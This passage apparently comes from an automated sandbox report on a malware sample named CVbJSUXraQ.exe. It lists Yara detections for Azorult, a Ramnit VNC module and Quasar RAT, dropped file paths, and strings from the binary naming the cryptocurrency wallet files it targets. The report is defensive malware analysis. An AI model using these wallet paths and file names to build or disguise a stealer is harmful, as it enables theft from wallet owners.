Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Yara detected Azorult

Show sources

Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Detected AZORult Info Stealer

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004186C4		7_2_004186C4
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004186C4		7_2_004186C4

Yara detected Ramnit VNC Module

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: electrum.dat
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: Coins\Exodus
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: Coins\Ethereum
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\

Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
